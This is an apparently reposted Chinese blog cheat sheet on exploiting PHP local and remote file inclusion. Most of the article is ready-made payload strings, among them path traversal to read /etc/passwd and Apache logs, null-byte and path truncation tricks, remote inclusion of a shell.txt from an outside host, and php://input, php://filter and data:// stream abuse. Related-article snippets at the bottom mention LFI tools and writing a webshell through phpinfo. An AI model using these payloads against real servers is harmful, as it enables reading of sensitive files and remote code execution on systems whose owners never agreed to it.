PHP文件包含漏洞利用

最新推荐文章于 2024-05-02 21:57:09 发布
最新推荐文章于 2024-05-02 21:57:09 发布
阅读量82 收藏
点赞数
文章标签: php shell
原文链接:http://www.cnblogs.com/shsgl/p/3931495.html
版权
PHP文件包含漏洞利用

一、PHP配置在文件包含中的运用

 
文件包含 漏洞即 当程序员在包含文件的过程中引入了外部提交的数据参与包含的过程所产生的漏洞,这个漏洞是目前Web攻击中最利用率最高的一个漏洞,攻击者 可以轻松获取服务器的访问权限(即拿到webshell)。而文件包含通常又有本地文件包含(Local File Inclusion)和远程文件包含(Remote File Inclusion)之分。allow_url_fopen和allow_url_include是决定包含属于本地文件包含(LFI)还是远程文件包含 (RFI)的条件,在 PHP4中则只有一个allow_url_fopen选择。其中allow_url_fopen和 allow_url_include为0n的情况为远程文件包含漏洞,相反为本地文件包含漏洞。
在文件包含中典型的两种格式如下:
1.需要截断的文件包含
include($_GET['sb']);
 
include(“$_GET['dir']/test.php”);
在这里要想利用文件包含就必须突破后面/test.php的限制,而通常截断后面数据的有三个办法。
(1)使用%00来截断
适合场合:Magic_quote为off的情况下
 
2)使用?截断
适合场合:远程文件包含(RFI),相当于又构造了一次Get请求。http://127.0.0.1:81/
include.php?dir=http://127.0.0.1:81/shell.txt?
 
(3)通过使路径长度达到一定长度限制时截断
通常Windows的截断长度为240,Linux的截断长度为4096
使用场合:均适用
由于Windows和Linux的文件名都有一个最大路径长度(MAX_PATH)的限制,因此当提交文件名的长度超过了最大路劲长度限制是就会截断后面的内容,从而达到文件包含的效果
include.php?dir=http://127.0.0.1:81/shell.txt//
 
2.直接包含的类型
include(“$_GET['dir']“);
可以直接在dir中指定文件名就能实现文件包含,而不需要经过截断处理。
在register_globals为on的情况下,如果变量未初始化则可以达到文件包含的效果,通常网上发的文件包含 漏洞都没有上面两种那么直接,大部分需要register_globals的配合才能实现文件包含。
 
基本的文件包含漏洞:
code : 
* 包含同路径下的文件:
?file=.htaccess
* 路径遍历:
?file=../../../../../../../../../var/lib/locate.db
(该文件非常有趣因为它允许你搜索文件 系统)
* 包含注入PHP代码的文件:
?file=../../../../../../../../../var/log/apache/error.log
(you can find other possible Apache dirs here and other ways here. Think about all possible logfiles, file uploads, session files etc.)
 
受限的本地文件包含:
code : 
* 空字符注入(Null Byte Injection):
?file=../../../../../../../../../etc/passwd%00
(需要magic_quotes_gpc=off)
* 列目录(Null Byte Injection):
?file=../../../../../../../../../var/www/accounts/%00
(仅限BSD, 需要magic_quotes_gpc=off,详细信息here)
 
*路径截断(Path Truncation):
?file=../../../../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
(详细信息参见 here 和 here)
* 点号截断:
?file=../../../../../../../../../etc/passwd……………. …
(仅限Windows, 更多细节参见 here)
 
基本的远程文件包含:
code : 
* 包含远程代码(Including Remote Code):
?file=[http|https|ftp]://websec.wordpress.com/shell.txt
(需要 allow_url_fopen=On 和 allow_url_include=On)
* 使用php输入流(Using PHP stream php://input):
?file=php://input
(specify your payload in the POST parameters, watch urlencoding, details here, requires allow_url_include=On)
* 使用PHP过滤函数(Using PHP stream php://filter):
?file=php://filter/convert.base64-encode/resource=index.php
(lets you read PHP source because it wont get evaluated in base64. More details here and here)
 
* Using data URIs:
?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
(需要 allow_url_include=On)
 
 
* 用于跨站脚本攻击(Using XSS):
?file=http://127.0.0.1/path/xss.php?xss=phpcode
(makes sense if firewalled or only whitelisted domains allowed)
 
受限的远程文件包含漏洞
code : 
* ?file=http://websec.wordpress.com/shell
* ?file=http://websec.wordpress.com/shell.txt?
* ?file=http://websec.wordpress.com/shell.txt%23
(需要 allow_url_fopen=On 和 allow_url_include=On)
 
静态远程文件包含漏洞:
code : 
* 中间人攻击(Man In The Middle)
(lame indeed, but often forgotten)

转载于:https://www.cnblogs.com/shsgl/p/3931495.html

weixin_30843605
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
toxin:LFI(本地文件包含漏洞利用工具
05-30
Toxin 利用特定(但也是常见)类型的本地文件包含 (LFI) 漏洞,攻击者可以利用漏洞利用 PHP 的register_globals设置。 在这种攻击场景中,攻击者会制作一个自定义的User-Agent标头,其中包含任意 PHP 代码,这些...
php本地文件包含漏洞,php文件包含漏洞利用小结
weixin_31860973的博客
03-09 1672
漏洞概述:文件包含漏洞是指客户端(一般为浏览器)用户通过输入控制动态包含在服务器的文件,从而导致恶意代码的执行及敏感信息的泄露,主要包括本地文件包含LFI和远程文件包含RFI两种形式。产生原因:在通过 PHP 的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入利用条件:1、用户能够控制这个动态变量2、include()等函数通...
文件包含漏洞利用
qq_56327824的博客
04-27 2970
文件包含漏洞给是“代码注入”的一种,“代码注入”这种攻击,其原理就是注入一段用户能控制的脚本或代码,并让服务器执行 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节 省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接
PHP文件包含漏洞利用phpinfo写入webshell
ADummy的博客
02-26 3872
带有PHPINFO的PHP本地文件包含RCE by ADummy 0x00利用路线 ​ 执行exp—>getshell ​ 适用于有本地文件包含漏洞,有phpinfo,怎么写入webshell的情况 0x01漏洞介绍 ​ 在PHP文件包含漏洞中,当我们找不到要触发RCE的有效文件时,如果有PHPINFO可以告诉我们随机生成的临时文件名及其位置,则可能可以包含一个临时文件利用它来利用它。 启动环境后,可访问http://your-ip:8080/phpinfo.php以获取PHPINFO页
文件包含漏洞全面详解
热门推荐
m0_46467017的博客
08-17 5万+
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含文件,而开发人员又没有对要包含文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。...
php文件包含漏洞利用
黑面狐
03-21 2687
上周我们部门弄了一个web安全的兴趣小组。说实话实在惭愧我虽然在安全公司每天都面对着各种漏洞,但是对渗透技术知之又少。于是加入兴趣小组后痛下决心好好学习渗透知识。 现在记录一下上周兴趣小组出的一个测试题目。由于0基础,花了两天时间才解决。 具体要求:读取网站根目录下的一个文本文件中的flag内容,具体的flag格式类似ahflag{xxxxxxxxxxxxxx} 好的,打开测试站点看看。
渗透测试技术之本地文件包含
02-01
通过加强对本地文件包含(LFI)渗透测试技术的研究,可以帮助渗透测试人员和学生在未来的渗透测试过程中,识别和测试LFI漏洞。在Web程序渗透测试中,利用本文中的技术发现的LFI漏洞是渗透测试中的典型漏洞。此外,在...
文件包含知识点总结.pdf
02-10
根据网上视频课程学习总计知识点,文档结构分为文件包含的定义、php文件包含函数、漏洞原理及特点、常见的利用方式做出总结 整理为文档 可以方便查阅
supervisor 简单理解
qq_42857358的博客
04-28 290
test.ini文件内容。
桌面运维岗面试三十问
一坨小橙子的博客
04-28 811
桌面运维岗面试问题及答案汇总
PHP算命源码_最新测算塔罗源码_可以运营
吉他程序员的博客
04-30 376
八字精批、事业财运、姓名分析、宝宝起名、公司测名、姓名配对、综合详批、姻缘测算、牛年感情、PC版测算、八字合婚、紫微斗数、鼠年运程、月老姻缘、许愿祈福、号码解析、塔罗运势、脱单占卜、感情继续、脱单占卜、塔罗爱情、心理有你、能否复合、暗恋对象、是否分手、爱着别人、大师服务(包含多项功能)共计30余项功能,全网功能全,完善的版本。
网络之路29:三层链路聚合
衡水铁头哥的博客
04-28 720
正文共:1666 字 17 图,预估阅读时间:3 分钟目录网络之路第一章:Windows系统中的网络0、序言 1、Windows系统中的网络 1.1、桌面中的网卡 1.2、命令行中的网卡 1.3、路由表 1.4、家用路由器网络之路第二章:认识企业设备2、认识企业设备 2.1、MSR810-W外观 2.2、登录MSR810-W管理页面 2.3、快速设置上网 2.4、WLAN配置 2...
windows11安装nginx
xiaobai_cpp的博客
04-30 291
5.网络->侦听端口,查看nginx侦听的端口,这里是90端口。1.解压nginx安装包到没有中文的目录。3.任务管理器查看是否有nginx进程。4.任务管理器->性能->资源监视器。2.双击运行nginx.exe。
Linxu系统服务管理,systemd知识/进程优先级/平均负载/php进程CPU100%怎么解决系列知识!
2302_78067597的博客
04-28 957
进程执行时候是排队执行的,需要插队,要调整。进程重要性高,需要优先多分配CPU。调整优先级。#记住用途nice: 调整【程序运行时】的优先级 renice:调整【运行中的进程】的优先级区别:nice命令常用于修改未运行的程序再运行时的优先级,但是对于正在运行的进程,若想要修改优先级,就需要用到renice命令。衡量系统繁忙的一个综合性指标,主要是cpu/io的繁忙程度;在工作中非常常用。工作中非常的常用,具体是哪一个指标繁忙ps,top,sar看cpu。
远程桌面的端口配置与优化
day3ZY的博客
04-29 535
然而,随着网络攻击的增加,确保远程桌面连接的安全性变得尤为重要。通过更改远程桌面的默认端口并采取其他安全措施,管理员可以大大提高远程桌面连接的安全性,从而保护企业的数据和资源。4. 在“本地设备和资源”窗口中,点击“远程端口”旁边的“下拉箭头”,然后选择一个不同的端口号。确保只有必要的计算机和用户可以访问新的远程桌面端口。1. 打开“开始”菜单,搜索“远程桌面连接”,并打开它。保持远程桌面服务和操作系统的更新,以获取最新的安全补丁。2. 在“远程桌面连接”窗口中,点击“显示选项”。
用龙梦迷你电脑福珑2.0做web服务器
最新发布
shencz2000的专栏
05-02 200
用龙梦迷你电脑福珑2.0上做web服务器是可行的。已将一个网站源码放到该电脑,在局域网里可以访问网站页面。以及通过花生壳软件,也可以在外网访问该内网服务器网站页面。该电脑的操作系统属于LAMP。在该电脑上安装了Loongnix 1.0。能顺利完成安装web服务器所需要的软件。详情请查看我写的上一篇文章。
laravel rabbitmq 队列
昊喵喵博士
04-30 568
解决方案,这是一个来自.env文件的问题。将登录详细信息的名称从RABBITMQ_LOGIN更改为RABBITMQ_USER。
preg_match详解(反向引用和捕获组)
m0_75178803的博客
04-29 895
在讲preg_match函数之前,我们先了解一下什么是php可变变量。
dvwa文件包含漏洞利用
07-28
DVWA文件包含漏洞利用是指利用DVWA(Damn Vulnerable Web Application)中存在的文件包含漏洞进行攻击。文件包含漏洞是一种常见的安全漏洞,它允许攻击者通过构造恶意请求来包含并执行服务器上的任意文件。 在DVWA...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值